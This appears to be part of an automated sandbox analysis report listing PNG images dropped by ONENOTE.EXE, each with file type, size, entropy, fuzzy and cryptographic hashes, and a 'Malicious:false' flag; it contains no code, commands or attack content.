                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
